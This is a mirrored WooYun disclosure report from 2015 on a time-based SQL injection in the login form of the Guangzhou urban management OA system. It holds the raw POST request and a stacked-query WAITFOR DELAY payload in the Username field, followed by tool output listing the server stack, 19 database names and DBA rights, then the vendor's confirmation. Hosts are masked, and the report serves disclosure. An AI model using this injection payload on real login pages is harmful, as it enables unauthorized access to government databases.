乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-02: 细节已通知厂商并且等待厂商处理中 2015-09-03: 厂商已经确认,细节仅向厂商公开 2015-09-13: 细节向核心白帽子及相关领域专家公开 2015-09-23: 细节向普通白帽子公开 2015-10-03: 细节向实习白帽子公开 2015-10-18: 细节向公众公开
RT
漏洞系统:广州城管网OA办公系统
http://**.**.**.**/
漏洞地址:
POST /Login.aspx HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveContent-Length: 277Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=wx33eb45xab13p3zjjbxav55__VIEWSTATE=dDwtMTc0NDc5MTAyODt0PDtsPGk8MD47PjtsPHQ8O2w8aTwxOT47PjtsPHQ8cDw7cDxsPG9uY2xpY2s7PjtsPFZCU2NyaXB0OkNoZWNrRGF0YSgpOz4%2BPjs7Pjs%2BPjs%2BPjs%2B&ServerAddress=http%3A%2F%2F**.**.**.**%2F&portnum=&UsbKey=&pid=&hideuser=&Username=admin&Password=admin&btnLogin=%B5%C7+%C2%BC
Username参数存在时间注入
---Parameter: Username (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: __VIEWSTATE=dDwtMTc0NDc5MTAyODt0PDtsPGk8MD47PjtsPHQ8O2w8aTwxMT47aTwxOT47PjtsPHQ8cDxwPGw8VGV4dDs O2w85Yqg5a G6ZSB6ZSZ6K v77yaOz4 Oz47Oz47dDxwPDtwPGw8b25jbGljazs O2w8VkJTY3JpcHQ6Q2hlY2tEYXRhKCk7Pj4 Ozs Oz4 Oz4 Oz4=&ServerAddress=http://**.**.**.**/&portnum=&UsbKey=&pid=&hideuser=&Username=admin';WAITFOR DELAY '0:0:5'--&Password=admin&btnLogin=%B5%C7 %C2%BC---[19:50:21] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2000
数据库:
available databases [19]:[*] cgzhzf_ns[*] cgzhzf_three[*] config_db[*] gzcgzdCARD[*] gzcgzdQC[*] JKCWFDB_ARchive_gzj[*] JKCWFDB_Recycle_gzj[*] JKCWFDB_SYSTEM_GZJ[*] JKCWFDB_WORK_GZJ[*] master[*] model[*] monitor_db[*] msdb[*] NetGz[*] Northwind[*] perf_db[*] pubs[*] Temp[*] tempdb
DBA权限:
危害等级:高
漏洞Rank:10
确认时间:2015-09-03 17:42
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:10正在联系相关网站管理单位处置。
暂无